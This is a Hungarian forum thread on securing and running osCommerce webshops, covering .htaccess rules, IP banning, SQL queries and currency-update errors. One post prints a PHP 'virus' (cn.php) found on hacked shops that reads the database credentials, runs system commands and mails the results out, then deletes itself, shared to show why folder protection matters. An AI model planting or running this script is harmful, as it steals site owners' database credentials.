- uleFone Power
- Samsung Galaxy S24 Ultra - ha működik, ne változtass!
- Honor Magic6 Pro - kör közepén számok
- Samsung Galaxy S23 FE - nincsen sárkány
- Fotók, videók mobillal
- Samsung Galaxy S20 FE - tényleg nem lite
- Samsung Galaxy S23 Ultra - non plus ultra
- iPhone topik
- Samsung Galaxy Watch4 és Watch4 Classic - próbawearzió
- Redmi Note 13 Pro 5G - nem százas, kétszázas!
Hirdetés
-
Olcsó USB WiFi AC adapter
lo Egy olcsó WiFi AC USB adapter jó szolgálatot jelenthet, ha az új router csak elvileg támogatja a 2,4 GHz-es átvitelt.
-
Biztonsági aggályok miatt késik a Microsoft hatalmas AI-újítása
it A Microsoft úgy döntött, hogy biztonsági aggályok miatt elhalasztja a Recall AI funkciót, így azt csak szűkebb körben tesztelik egyelőre.
-
Bezárt a Wizard With a Gunt fejlesztő stúdió
gp Alig kilenc évvel a megalapítása után sajnos feloszlott a csapat.
Új hozzászólás Aktív témák
-
Maximx
tag
válasz DiabloCorsa #12101 üzenetére
nálam nincs a catalog/includes mappában .htacces fájl
-
Belba
őstag
Ma azt vettem észre a Supertracker bővítményem segítségével, hogy egy orosz IP-ről 2 óránként A-tól Z-ig feltérképezik a shopomat...
========================================
77.88.29.247 (Russian Federation) - spider41.yandex.ru
Hostname: spider41.yandex.ru
ISP: YANDEX LLC
Organization: Yandex enterprise network
Proxy: None detected
Type: UnknownCountry: Russian Federation
State/Region: 48
City: Moscow
Latitude: 55.7522
Longitude: 37.6156========================================
Erről az jutott eszembe, hogy mi lenne, ha bővítmény segítségével IP-cím alapján tiltanánk ki a nem kívánatos látogatókat???...
Én alapból kitiltanék minden orosz IP-t!!!
Találtam is egy ilyesmi bővítményt : Secure your site with an IP trap
A blokkolt (kitiltott) user ezt a weboldalt láthatja : http://www.development-server.net/j/blocked.php
Közben az is eszembe jutott, hogy ezzel az APEH és a Fogyasztóvédők Kedves Munkatársait is ki lehetne tiltani.
A dolognak csak az a szépséghibája (ahogy futólag belenéztem a bővítménybe), hogy egy "whiteliste"-ban az engedélyezett IP-ket kell beírni, egy tiltólistára meg a letiltott IP-ket kell beírni... Így ez már elég bonyolultnak tűnik...
Vagyis így elsőre képtelenség minden IP-t beírni, aki megnézheti a shopunkat!Olyan bővítmény kellene, amely csak a letiltott IP-k elől zárja le a weboldalunkat, mindenki más számára megnézhető maradna.
Mi a véleményetek???
Csinált már valaki hasonló védelmet???
< A lehetetlen mindössze annyit jelent, hogy még nem találtad meg a megoldást. >
-
Belba
őstag
válasz DiabloCorsa #12101 üzenetére
Nálam is csak a főkönyvtárban van .htacces fájl...
< A lehetetlen mindössze annyit jelent, hogy még nem találtad meg a megoldást. >
-
DiabloCorsa
őstag
Hm...
Az új verzóban van az includes mappában.
Ide írom, ezt kell elmenteni és .htacces néven és be másolni a 2 könyvtárba.
includes és images
# $Id: .htaccess 1739 2007-12-20 00:52:16Z hpdl $
#
# This is used with Apache WebServers
# The following blocks direct HTTP requests in this directory recursively
#
# For this to work, you must include the parameter 'Limit' to the AllowOverride configuration
#
# Example:
#
#<Directory "/usr/local/apache/htdocs">
# AllowOverride Limit
#
# 'All' with also work. (This configuration is in your apache/conf/httpd.conf file)
#
# This does not affect PHP include/require functions
#
# Example: http://server/catalog/includes/application_top.php will not work
<Files *.php>
Order Deny,Allow
Deny from all
</Files>Itt egy "vírus" a cn.php
<?
require("../includes/configure.php");
$pole =
array(HTTP_SERVER,DB_SERVER,DB_SERVER_USERNAME,DB_SERVER_PASSWORD,DIR_WS_HTTP_CATALOG);
$system = array(system(id),system("uname -a"));
mail("xxxx@yyyyyyy.xxx", "hack", "server : $pole[0]$pole[4] host :
$pole[1] user : $pole[2] password : $pole[3]
more info: $system[0], $system[1]");
unlink("cn.php");
?>amit megfelelő images mappa védelem nélkül böngészőből bárki futtathat.
Az email cím helyére (xx yy xx ) próbaként bárki írja be a sajátját és másolja be az images mappába, majd böngészőből hívja meg. Előszőr htacces nélkül, aztán htaccessel.
Nem kell megijedni, kapni fog egy emailt. Az eredetiben a hacker email címe van!!
Aki ezt az MÁR images mappában találja, az már elkésett!!!!
A próba után, gondolom mindenki törölni fogja!!!!
[ Szerkesztve ]
Diablo. Ha gumira van szükséged ...
-
vakondka
őstag
válasz Maximx #12102 üzenetére
Pedig az Rc2a verzióban már benne van a htaccess fájl is, a régebbi verziókban nincs benne.
De ha valaki megszerezte az ftp hozzáférést, akkor ugyan mindegy milyen védelmed van
Kivéve ha használod aktívan a Médiacenteres FTP-kaput. (ami még a jogos felhasználót is csak 24 órára engedi be)az includes/.htaccess tartalma:
# $Id: .htaccess 1739 2007-12-20 00:52:16Z hpdl $
#
# This is used with Apache WebServers
# The following blocks direct HTTP requests in this directory recursively
#
# For this to work, you must include the parameter 'Limit' to the AllowOverride configuration
#
# Example:
#
#<Directory "/usr/local/apache/htdocs">
# AllowOverride Limit
#
# 'All' with also work. (This configuration is in your apache/conf/httpd.conf file)
#
# This does not affect PHP include/require functions
#
# Example: http://server/catalog/includes/application_top.php will not work
<Files *.php>
Order Deny,Allow
Deny from all
</Files>szerk: Diablo gyorsabb volt
[ Szerkesztve ]
https://toptarget.hu - Online Marketing Ügynökség
-
DiabloCorsa
őstag
Ilyen bannolás már régóta létezik: banned.php.
Talán még nálad is meg van (ha nem törölted ?).
Új verziók találhatók itt: http://addons.oscommerce.com/info/1561
Diablo. Ha gumira van szükséged ...
-
Maximx
tag
válasz DiabloCorsa #12106 üzenetére
Köszönöm!
Így már okés!
-
djsite
tag
Boldog Újévet Kívánok minden kedves fórum társamnak!!!
Már megint hülye kérdésekkel fárasztalak titeket.
1. Az include/configure.php-ban szerepel a define('DIR_WS_IMAGES', 'images/'); bejegyzés.
a kérdésem, ha ezt megváltoztatom akkor a termékek képeit oda fogja feltenni? Mert a termékek képeit én egy külön mappában szeretném elhelyezni.2. Nálam a catalog/products_new.php leagalján szerepel az összes termék, hogy hány darab van. Na ezt szeretném belehelyezni a header.phpba. Már két napja szenvedek vele, de nem megy
Szerintem ezek másoknak is érdekesek, hasznosak lehetnek.
Próbáltam keresni itt a fórumon "valamit" hozzá, de nem igazán találtam.[ Szerkesztve ]
-
Kolli7
tag
válasz djsite #12114 üzenetére
Kedves Djsite!
Keress rá, mert fogsz róla találni bejegyzést.
Épp nekem volt egy kisebb vitám a többiekkel, mert szerintem ennek az a rendeltetése, hogy az éppen feltett újdonságokat mutassa meg, vagyis ne az összes terméket.
Akkor is, mint most neked, az volt a probléma, hogy a feltett összes terméket kilistázta a rendszer.
Nekem ezt Vakondka úgy oldotta meg, hogy beírt egy lejárati időt, ami után ez a lista automatikusan törlődik.
Nekem most 30 napra van beállítva, de állíthatod kevesebbre is.
Én nagyon szeretem ezt használni, mert rögtön kilistázza, hogy most pl. januárban feltettem 30 terméket!
Ha a vevő erre kiváncsi, mert már többször járt az oldalamon, akkor rögtön értesül a legújabb fejleményekről.
Ha megtalálom, belinkelem neked.Meg is találtam:
#5582[ Szerkesztve ]
-
djsite
tag
válasz Kolli7 #12115 üzenetére
Kedves Kolli7!
Nagyon jó amit írtál, eszembe se jutott, viszont én nem erre gondoltam, ha nem arra, hogy a header.php fájlban szerepeljen, hány termék van összesen az oldalon. Így minden egyes oldalon látni majd.
Viszont meg kell hagyni tényleg remek amit írtál. Ki is próbálom.
Üdv: djsite
-
Kolli7
tag
válasz Kolli7 #12115 üzenetére
Lemaradt a vége
Nálam ez van az 56. sorban:$products_new_query_raw = "select p.products_id, pd.products_name, p.products_image, p.products_price, p.products_tax_class_id, p.products_date_added, m.manufacturers_name from " . TABLE_PRODUCTS . " p left join " . TABLE_MANUFACTURERS . " m on (p.manufacturers_id = m.manufacturers_id), " . TABLE_PRODUCTS_DESCRIPTION . " pd where p.products_status = '1' and p.products_id = pd.products_id and pd.language_id = '" . (int)$languages_id . "' and p.products_date_added > CURDATE() - INTERVAL 30 DAY order by p.products_date_added DESC, pd.products_name";
Ez pedig az 57. sor:
$products_new_split = new splitPageResults($products_new_query_raw, MAX_DISPLAY_PRODUCTS_NEW); -
djsite
tag
válasz Kolli7 #12115 üzenetére
Kipróbáltam! Az alábbi hibaüzenetet kaptam
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by p.products_date_added DESC, pd.products_name limit 0, 10' at line 1
select p.products_id, pd.products_name, p.products_image, p.products_price, p.products_tax_class_id, p.products_date_added, m.manufacturers_name from products p left join manufacturers m on (p.manufacturers_id = m.manufacturers_id), products_description pd where p.products_status = '1' and p.products_id = pd.products_id and pd.language_id = '1' order by p.products_date_added > CURDATE() - INTERVAL 30 DAY order by p.products_date_added DESC, pd.products_name limit 0, 10Viszont már meg is oldottam
TÉNYLEG JÓ! TETTSZIK!
[ Szerkesztve ]
-
vakondka
őstag
válasz djsite #12121 üzenetére
Ilyesmire gondoltál ?
<?php
$products_count = tep_db_fetch_array(tep_db_query("select count(*) as total from " . TABLE_PRODUCTS . " where products_status=1"));
echo 'Weboldalunkon '. $products_count['total']. ' termék található összesen';
?>Kolli:
Ha kódot szúrsz be ide a fórumra, légy szíves használd a "Programkód" gombot,
mert különben nem lehet se elolvasni, se helyesen kimásolni...[ Szerkesztve ]
https://toptarget.hu - Online Marketing Ügynökség
-
alfakgy
csendes tag
válasz vakondka #12124 üzenetére
Sziasztok!
Sikerült telepitsem a webshopot de a pénznemek frissitésénél egy rakás hibát ir ki:
ezt hogy tudnám megoldani?Warning: file() [function.file]: URL file-access is disabled in the server configuration in /web/patronuzlet/patronuzlet.eu/tavasz/includes/functions/localization.php on line 14
Warning: file(http://www.oanda.com/convert/fxdaily?value=1&redirected=1&exch=EUR&format=CSV&dest=Get+Table&sel_list=HUF) [function.file]: failed to open stream: no suitable wrapper could be found in /web/patronuzlet/patronuzlet.eu/tavasz/includes/functions/localization.php on line 14
Warning: implode() [function.implode]: Invalid arguments passed in /web/patronuzlet/patronuzlet.eu/tavasz/includes/functions/localization.php on line 18
Warning: file() [function.file]: URL file-access is disabled in the server configuration in /web/patronuzlet/patronuzlet.eu/tavasz/includes/functions/localization.php on line 28
Warning: file(http://www.xe.net/ucc/convert.cgi?Amount=1&From=HUF&To=EUR) [function.file]: failed to open stream: no suitable wrapper could be found in /web/patronuzlet/patronuzlet.eu/tavasz/includes/functions/localization.php on line 28
Warning: implode() [function.implode]: Invalid arguments passed in /web/patronuzlet/patronuzlet.eu/tavasz/includes/functions/localization.php on line 32
Warning: file() [function.file]: URL file-access is disabled in the server configuration in /web/patronuzlet/patronuzlet.eu/tavasz/includes/functions/localization.php on line 14
Warning: file(http://www.oanda.com/convert/fxdaily?value=1&redirected=1&exch=HUF&format=CSV&dest=Get+Table&sel_list=HUF) [function.file]: failed to open stream: no suitable wrapper could be found in /web/patronuzlet/patronuzlet.eu/tavasz/includes/functions/localization.php on line 14
Warning: implode() [function.implode]: Invalid arguments passed in /web/patronuzlet/patronuzlet.eu/tavasz/includes/functions/localization.php on line 18
Warning: file() [function.file]: URL file-access is disabled in the server configuration in /web/patronuzlet/patronuzlet.eu/tavasz/includes/functions/localization.php on line 28
Warning: file(http://www.xe.net/ucc/convert.cgi?Amount=1&From=HUF&To=HUF) [function.file]: failed to open stream: no suitable wrapper could be found in /web/patronuzlet/patronuzlet.eu/tavasz/includes/functions/localization.php on line 28
Warning: implode() [function.implode]: Invalid arguments passed in /web/patronuzlet/patronuzlet.eu/tavasz/includes/functions/localization.php on line 32
Warning: Cannot modify header information - headers already sent by (output started at /web/patronuzlet/patronuzlet.eu/tavasz/includes/functions/localization.php:14) in /web/patronuzlet/patronuzlet.eu/tavasz/includes/functions/general.php on line 22
-
Marsy51
aktív tag
válasz vakondka #12124 üzenetére
OK! Igazából nem tünt fel, de most, hogy nézem ez nem a legjobb kiírás. A réginél mindent ellehetett olvasni. Itt viszont nem pl.: az ö, az igazából összesen, de csak akkor látszik ha kimásolom. Nekem a régi jobbnalk tünt. Ez nem tetszik. De, kinek a pap, kinek a papné, kinek a kispap vagy a harngozó vagy a sekrestyés.
Marsy51 ("The truth is out there") osCommerce - Magyarország http://www.oscommerce-extra.hu
-
Marsy51
aktív tag
válasz alfakgy #12125 üzenetére
Szia!
A honlapodat nézve http://patronuzlet.eu az admin felületen az Eurónak nem adtál értéket a Forinthoz képest.Marsy51 ("The truth is out there") osCommerce - Magyarország http://www.oscommerce-extra.hu
-
vakondka
őstag
válasz alfakgy #12125 üzenetére
Szia,
Ez azért van, mert a tárhelyen nincs engedélyezve hogy idegen weblapon megnyissál egy fájlt.
Ha szerencsés vagy akkor a szolgáltatód bekapcsolja neked ezt, ha nem akkor kicsit át kell írni a webshop ezen funkcióját...van rá bővítmény valahol az oscommerce oldalánAzt hiszem ez az: [link]
[ Szerkesztve ]
https://toptarget.hu - Online Marketing Ügynökség
-
deviance1976
tag
válasz DiabloCorsa #12106 üzenetére
Diablo és Vakondka!
Köszi a jótanácsot! Be is raktam mindkét mappába a .htaccess file-t.
Bár nekem osCommerce Online Merchant v2.2 RC2a verzióm van, mégsem volt benne a 2 file.
-
deviance1976
tag
-
vakondka
őstag
válasz DiabloCorsa #12134 üzenetére
Akkor már tudjuk, hogy ki töri fel a shopokat...
https://toptarget.hu - Online Marketing Ügynökség
-
DiabloCorsa
őstag
válasz deviance1976 #12135 üzenetére
Elég ennyi, vagy menjek tovább?
Így jár aki sablont vesz... Alapvető osc védelmi dolgok HIÁNYOZNAK!!
Amik az eredeti teleptőben BENNE vannak.
[ Szerkesztve ]
Diablo. Ha gumira van szükséged ...
-
vakondka
őstag
válasz DiabloCorsa #12137 üzenetére
Jézus mária !
Ha kilistázhatóak a könyvtárak az nagy felelőtlenség és biztonsági rés valóban !Nem azért írom hogy fényezzem a Médiacentert, de ott ez alap dolog.
Egy kattintás az admin felületen, hogy listázás tiltása és kész is van,
többé nem listázható egyik könyvtár sem, függetlenül az oscommerce verziótól.Szóval ha Médiacenternél vagy kapcsold be a könyvtárak listázásának tiltását, ha nem akkor pedig htaccess kell.
https://toptarget.hu - Online Marketing Ügynökség
-
DiabloCorsa
őstag
válasz vakondka #12138 üzenetére
Próbáld kilistázni bárhol az includes mappát!
Nem lehet sehol...
Itt gond nélkül. A többi hibát nem írom, mert holnapra eltüntetik a shopját.
Deviance!
Teljes osc rendszer csere ajánlott azonnal!!!!
Ez a kép nem látható, igaz?
Csak itt:
Ha törlöd tárhelyedről, innen is eltűnik. Vagy itt is maradhat.
Diablo. Ha gumira van szükséged ...
-
deviance1976
tag
válasz DiabloCorsa #12140 üzenetére
Diablo
Most próbáld meg légyszíves... (előre is köszi)
Vakondka
Nagyon köszönöm a segítségedet, kijavítottam az Adminba...
-
DiabloCorsa
őstag
válasz deviance1976 #12142 üzenetére
Oké!
Itt látsz lent egy szunyókáló ördögöt. A kép tárhelyeden van, keresd meg!
Ez ott van kb. 17:00-óta.Most is felküldtem egy képet, az ott van (valahol?) kb. 2 perce.
Én tudom hol vannak!!
Jó, hogy nem lehet listázni, de azt hogy mi hol van az osc fájlrendszerben NEM CSAK én tudom.
[ Szerkesztve ]
Diablo. Ha gumira van szükséged ...
-
deviance1976
tag
válasz DiabloCorsa #12143 üzenetére
Megtaláltam mindkét file-t. A második egy kutyás kép volt.
Most ebbe a könyvtárba is beleraktam a .htacces filet. Így is fel tudsz rá tölteni?
-
DiabloCorsa
őstag
válasz deviance1976 #12144 üzenetére
Persze. A kutyás kép ott van átnevezve is. (1)
Angolul, bár de bele van írva a htaccess fájlba hogy mit csinál.
[ Szerkesztve ]
Diablo. Ha gumira van szükséged ...
-
deviance1976
tag
válasz DiabloCorsa #12145 üzenetére
Akkor ezek szerint nagy a gáz nálam? Más könyvtárakba is be tudsz írni?
Mi a teendőm?
-
DiabloCorsa
őstag
-
vakondka
őstag
válasz DiabloCorsa #12149 üzenetére
Törölték is !
Kicsit besegítettem[ Szerkesztve ]
https://toptarget.hu - Online Marketing Ügynökség